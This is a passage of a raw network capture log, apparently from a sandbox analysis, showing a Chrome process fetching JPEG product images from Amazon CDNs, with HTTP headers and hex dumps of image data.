                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 91 03 01 22 00 02 11 01 03 11 01 ff c4 00 96 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 08 01 09 10 00 02 01 03 02 03 04 06 06 05 09 07 05 00 00 00 01 02 03 00 04 11 05 21 06 12 31 13 32 51 61 22 41 71 91 a1 b1 07 14 42 72 81 d1 52 53 62 a2 c1 15 23
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!12Qa"AqBrRSb#
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1378INData Raw: 94 75 05 77 17 5d 90 01 b9 91 43 65 88 4c b7 5a ed 3e 1b 44 6c b3 1f e8 a4 ce 44 c3 45 19 5d 8d 28 0d 31 48 45 aa 90 5b 95 47 4e d5 e2 4f 70 89 76 f3 c9 6a 56 7b cb 38 7a 5d 07 f2 58 dc fc 7b bf 1a c7 2d e9 e0 7a c3 7e 9b f5 62 89 a3 e9 ea dd f6 9e 67 5f 24 c4 51 13 ef 7a da ad e6 59 91 64 5c e1 b3 8c ec 76 25 7c eb 94 7e 96 6f 7e b7 c5 17 6a 3a 5a c1 6b 17 b9 3b 63 fb d2 1a b0 92 a4 bc 2b 21 dc 66 98 cb a6 44 41 ca 0a 97 88 51 a4 00 e0 78 9f 95 6d 15 81 c3 f0 b6 ec 82 9d 2e 89 07 a9 07 ba ac 21 45 2c 40 45 24 d0 56 57 4f 89 18 2a a8 f7 54 ef 05 d9 a5 df 12 e8 d0 74 54 ba 8d 8f b2 d5 4d c1 a8 c8 df 2c 6a f3 f4 2b 64 97 fa fc f3 4d dc b6 b2 b9 61 b1 38 69 9d 61 4d 97 2d d1 8d 07 54 26 9f 2b f6 6a 00 1c e0 bf 50 46 de 8e fb fa ce de 35 ed eb 76 32 f6 8f dd
                                                                                                                                                                                                        Data Ascii: uw]CeLZ>DlDE](1HE[GNOpvjV{8z]X{-z~bg_$QzYd\v%|~o~j:Zk;c+!fDAQxm.!E,@E$VWO*TtTM,j+dMa8iaM-T&+jPF5v2
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1027INData Raw: e6 9d a3 50 98 c1 3d d0 36 07 d5 b6 2b 9f da 7f b2 bb 58 54 ad 74 43 0c e2 e6 e3 2a c8 09 cb 3f 33 f9 97 6c 92 14 0e bb ee 3c b3 46 d5 2d 97 53 b5 8a 6f 4d 91 09 7e c8 92 85 94 9e f7 8e 42 f7 09 04 2a 1e 94 fe da d5 b5 96 cf 5b 54 7d ce 32 2e 9d 0e ea 37 03 b2 8c f5 fd 63 0c 77 41 a9 0d 53 53 b4 d3 ca a4 b2 66 52 46 ca 8e e5 41 f1 e5 04 64 f8 75 ad 57 2b eb f1 26 66 7d a9 3c 55 61 63 1f 0f 6b 0d 6d 12 80 fa 7d d1 0c 72 ee 08 46 3d 5b 24 10 45 71 9c 52 e0 83 5d df ab 5a da 41 a5 6b 08 e3 d3 7b 4b e1 1f ad 47 34 2d b5 70 24 04 f2 27 2e 32 40 c6 7a 57 5a d7 19 dd 4f 2d cd 1c 4f 9a 83 e7 9d 7b d1 7e 2a c1 bf 23 44 37 81 3b e0 af de 52 3f d2 b4 8b 18 96 9c 24 b5 5c 8e f9 1b ba e0 fb 0d 39 17 34 16 98 4a 80 d2 11 92 a0 e3 db ea a8 4d 1e e0 fd 5a 23 9e ab 43 eb
                                                                                                                                                                                                        Data Ascii: P=6+XTtC*?3l<F-SoM~B*[T}2.7cwASSfRFAduW+&f}<Uackm}rF=[$EqR]ZAk{KG4-p$'.2@zWZO-O{~*#D7;R?$\94JMZ#C


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        125192.168.2.44990818.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC378OUTGET /images/I/31qnSUxnD0L._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC818INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 3635
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 9bad2ef2-7446-4e92-ad37-a61326e2dcf6
                                                                                                                                                                                                        Date: Sun, 21 Jul 2024 23:55:19 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Fri, 13 Oct 2023 04:21:39 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-512,/images/I/31qnSUxnD0L
                                                                                                                                                                                                        Expires: Sat, 16 Jul 2044 23:55:19 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-512 /images/I/31qnSUxnD0L
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Via: 1.1 ff571229df9f46b01b0e434bcb36f9e6.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 99444
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: 8wtzwrinvkgzmF7NipeHT8INcIHv0uIyRh0b3vkPjOyPd75w6YaQVw==
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC3635INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 2f 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 06 03 04 05 07 08 01 02 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ec b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"/


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        126192.168.2.44990918.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC378OUTGET /images/I/31iocnwzJSL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC841INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 4260
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 333b9e20-bd89-47fa-8660-680a49d83384
                                                                                                                                                                                                        Date: Sat, 10 Aug 2024 10:10:23 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Thu, 31 Oct 2019 10:34:21 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-335,/images/I/31iocnwzJSL
                                                                                                                                                                                                        Expires: Fri, 05 Aug 2044 10:10:23 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-335 /images/I/31iocnwzJSL
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 3c2af29a416fc74eb3d104df3f808fdc.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 390731
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: JE2cqlxm1Cp-tNPgwmNfeKOwKPQEiC5woJUyepsnrvDgurbZW0uiVw==
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC4260INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 30 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 06 02 03 04 05 01 07 08 09 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f6 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"0X


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        127192.168.2.44991118.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC378OUTGET /images/I/31J42iPc2iL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC829INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 4953
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 586bc83c-da31-4886-9582-b48e55fb18b7
                                                                                                                                                                                                        Date: Mon, 12 Aug 2024 17:07:52 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Thu, 06 Apr 2023 07:34:12 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-059,/images/I/31J42iPc2iL
                                                                                                                                                                                                        Expires: Sun, 07 Aug 2044 17:07:52 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-059 /images/I/31J42iPc2iL
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 179ba4c3ce59451c080c2ed7517bcb96.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: g6iDB-g_gXuRdiISaFqwdu-ZBnKse4rcBBYKvHdKFtgzohbYjNSpBw==
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC4953INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 31 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 01 04 06 07 08 03 02 09 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ec b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"1


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        128192.168.2.44991718.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC450OUTGET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-MmY4MjkxOWIt-w186._SY116_CB642007527_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC921INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 2140
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: ee2df66c-c188-4b6c-a744-99c5beede83d
                                                                                                                                                                                                        Date: Wed, 12 Jun 2024 15:10:17 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 06 Sep 2021 13:15:55 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-894,/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-MmY4MjkxOWIt-w186
                                                                                                                                                                                                        Expires: Tue, 07 Jun 2044 15:10:17 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-894 /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-MmY4MjkxOWIt-w186
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 7d758b616f5473c7b4bee1c49ecfa98a.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 5524071
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: Yk1j-fsCKi7jv3u4cvd3djS0YpkcN24_3srRCRSiKgmr70j0edsLyQ==
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC2140INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 01 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 04 05 08 03 02 01 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 05 06 01 02 03 04 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ea 00 00 00 af 0b 0d c4 b6 11 d3 00 00
                                                                                                                                                                                                        Data Ascii: JFIF""$$6*&&*6>424>LDDL_Z_||""$$6*&&*6>424>LDDL_Z_||t"5


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        129192.168.2.44991618.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC458OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763815_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC935INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 2163
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 4841404d-ff63-47b3-8889-e42f6e4119d6
                                                                                                                                                                                                        Date: Sun, 21 Jul 2024 20:00:03 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 07 May 2024 08:31:11 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-892,/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763815_372x232_2X_en_AE
                                                                                                                                                                                                        Expires: Sat, 16 Jul 2044 20:00:03 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-892 /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763815_372x232_2X_en_AE
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 77c9addf0db376b3faacc5e07c320552.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 625481
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: RKx8irEgI7dOoGeW5U-QavQDvGh-mXcH5usRi4bwqTa8TbrxXcPZFQ==
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC2163INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 88 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 04 05 08 01 03 02 10 00 02 02 01 02 03 04 08 03 06 07 01 00 00 00 00 01 02 00 03 04 05 11 06 12 21 07 13 31 61 22 32 41 51 52 71 81 91 14 23 a1 33 34 42 a2 b2 c2 15 43 72 83
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1a"2AQRq#34BCr


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        130192.168.2.44991918.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC458OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763856_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC936INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 3606
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 312b702c-7ba8-42ed-9a40-d8c7d3a58b16
                                                                                                                                                                                                        Date: Tue, 13 Aug 2024 06:03:20 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 07 May 2024 08:31:11 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-997,/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763856_372x232_2X_en_AE
                                                                                                                                                                                                        Expires: Mon, 08 Aug 2044 06:03:20 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-997 /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763856_372x232_2X_en_AE
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 3f24561b20ab2825cb11ac40fc1c2434.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 200088
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: mfgrKK0Zo8YIPXaiSkb24vzmkt5euOLT5jHVNYz-0cqM6vfEEarEQQ==
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC3606INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 99 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 07 03 04 05 06 08 02 01 10 00 02 01 03 02 03 05 05 04 0a 02 03 00 00 00 00 01 02 03 00 04 11 05 12 21 31 61 06 13 41 51 71 07 22 81 91 a1 14 32 a2 b1 08 15 23 24 43 62 72 82 c1 d1
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1aAQq"2#$Cbr


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        131192.168.2.44992218.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC450OUTGET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NDZjYTNkNGMt-w186._SY116_CB642007526_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
